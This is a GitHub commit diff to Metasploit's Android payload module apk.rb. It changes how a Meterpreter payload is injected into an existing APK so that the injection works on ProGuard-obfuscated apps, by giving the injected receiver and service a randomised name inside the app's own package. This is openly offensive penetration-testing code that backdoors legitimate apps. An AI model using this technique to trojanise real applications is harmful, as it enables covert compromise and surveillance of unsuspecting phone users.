Skip to content

Commit daae46d

Browse files
timwrtimwr
committed
Fixes rapid7#7552, fix apk injection into proguarded apks
1 parent 6a35b36 commit daae46d

File tree

1 file changed

+9
-4
lines changed

1 file changed

+9
-4
lines changed

lib/msf/core/payload/apk.rb

Lines changed: 9 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -68,7 +68,7 @@ def parse_manifest(manifest_file)
6868
}
6969
end
7070

71-
def fix_manifest(tempdir)
71+
def fix_manifest(tempdir, package)
7272
#Load payload's manifest
7373
payload_manifest = parse_manifest("#{tempdir}/payload/AndroidManifest.xml")
7474
payload_permissions = payload_manifest.xpath("//manifest/uses-permission")
@@ -98,8 +98,12 @@ def fix_manifest(tempdir)
9898
end
9999

100100
application = original_manifest.at_xpath('/manifest/application')
101-
application << payload_manifest.at_xpath('/manifest/application/receiver').to_xml
102-
application << payload_manifest.at_xpath('/manifest/application/service').to_xml
101+
receiver = payload_manifest.at_xpath('/manifest/application/receiver')
102+
service = payload_manifest.at_xpath('/manifest/application/service')
103+
receiver.attributes["name"].value = package + receiver.attributes["name"].value
104+
service.attributes["name"].value = package + service.attributes["name"].value
105+
application << receiver.to_xml
106+
application << service.to_xml
103107

104108
File.open("#{tempdir}/original/AndroidManifest.xml", "wb") { |file| file.puts original_manifest.to_xml }
105109
end
@@ -207,6 +211,7 @@ def backdoor_apk(apkfile, raw_payload)
207211
FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")
208212

209213
package = amanifest.xpath("//manifest").first['package']
214+
package = package + ".#{Rex::Text::rand_text_alpha_lower(5)}"
210215
package_slash = package.gsub(/\./, "/")
211216
print_status "Adding payload as package #{package}\n"
212217
payload_files = Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/*.smali")
@@ -232,7 +237,7 @@ def backdoor_apk(apkfile, raw_payload)
232237
injected_apk = "#{tempdir}/output.apk"
233238
aligned_apk = "#{tempdir}/aligned.apk"
234239
print_status "Poisoning the manifest with meterpreter permissions..\n"
235-
fix_manifest(tempdir)
240+
fix_manifest(tempdir, package)
236241

237242
print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n"
238243
run_cmd("apktool b -o #{injected_apk} #{tempdir}/original")

0 commit comments

Comments
 (0)